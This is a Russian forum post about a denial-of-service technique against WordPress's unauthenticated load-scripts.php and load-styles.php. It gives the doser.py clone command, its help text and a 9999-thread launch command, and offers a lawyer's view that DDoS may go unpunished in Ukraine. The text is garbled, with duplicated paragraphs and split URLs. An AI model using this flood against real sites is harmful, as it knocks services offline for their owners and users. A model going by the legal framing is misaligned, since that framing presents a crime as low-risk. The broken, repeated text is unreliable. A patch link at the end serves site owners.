Речь пойдет о DOS атаке на ВП сайты (WordPress)
В платформе есть две функции load-scripts.php и load-styles.php, позволяющие указать список загружаемых JS-скриптов или CSS. Они доступны на странице логина, поэтому не требуют авторизации. Cуть в том что бы уменьшить количество запросов к сайту при загрузке дополнительных файлов. Ну а на деле можно запросить все доступные файлы, загрузив сервер на 2 с лишним секунды и потребовав ответ в 4 МБ.
А самое интересное что ВП не считает это уязвимостью и не собирается ее прикрывать.
Ссылка скрыта от гостей
содержит три статьи: статья 272 «Неправомерный доступ к компьютерной информации», статья 273 «Создание, использование и распространение вредоносных программ для ЭВМ» и статья 274 «Нарушение правил эксплуатации ЭВМ, системы ЭВМ или их сети». Эти статьи предусматривают разнообразное наказание, в том числе штрафы, исправительные работы, обязательные работы (до 240 часов), арест либо лишение свободы сроком до семи лет.«Если бы Украину можно было бы назвать правовым государством без огромного количества уточнений и примечаний, то я сказал бы: уважаемые граждане, DDos в Украине не является уголовным преступлением и наказывать за это не будут, даже если поймают. Но в реалиях нынешней судовой системы могу сказать следующее: я готов взяться за защиту любого, кто будет обвинен в DDoS атаке, поскольку считаю позицию обвинения несостоятельной».
Суть здесь в следующем. Правоохранительные органы при расследовании киберпреступлений могут применить лишь ст. 361 УК Украины - «Несанкционированное вмешательство в работу ЭВМ». Сейчас, при отсутствии в законодательстве Украины любого определения что такое DDos, заход на любой сайт больше одного раза может считаться DDos-атакой. А если заходите на сайт одновременно с другими пользователями, то “участвуете в DDos-атаке”.
Суть здесь в следующем. Правоохранительные органы при расследовании киберпреступлений могут применить лишь ст. 361 УК Украины - «Несанкционированное вмешательство в работу ЭВМ». Сейчас, при отсутствии в законодательстве Украины любого определения что такое DDos, заход на любой сайт больше одного раза может считаться DDos-атакой. А если заходите на сайт одновременно с другими пользователями, то “участвуете в DDos-атаке”.
ht
ptional arguments:
-h, --help show this help message and exit
-g G Specify GE
tps://github.com/quitten/doser.py
git clone https://github.com/Quitten/doser.py.git
ptional arguments:
-h, --help show this help message and exit
-g G Specify GE
tps://github.com/quitten/doser.py
git clone https://github.com/Quitten/doser.py.git
-h, --help show this help message and exit
-g G Specify GET request. Usage: -g '<url>'
-p P Specify POST request. Usage: -p '<url>'
-d D Specify data payload for POST request
-ah [AH [AH ...]] Specify addtional header/s. Usage: -ah 'Content-type:
application/json' 'User-Agent: Doser'
-t T Specify number of threads to be used
-g G Specify GET request. Usage: -g '<url>'
-p P Specify POST request. Usage: -p '<url>'
-d D Specify data payload for POST request
-ah [AH [AH ...]] Specify addtional header/s. Usage: -ah 'Content-type:
application/json' 'User-Agent: Doser'
-t T Specify number of threads to be used
python doser.py -g '
Ссылка скрыта от гостей
' -t 9999И в заключении для владельцев wp сайта.
Парень который выложил эту уязвимость так же написал скрипт ,который устранит уязвимость: https://github.com/Quitten/WordPress/blob/master/wp-dos-patch.sh.
Последнее редактирование:
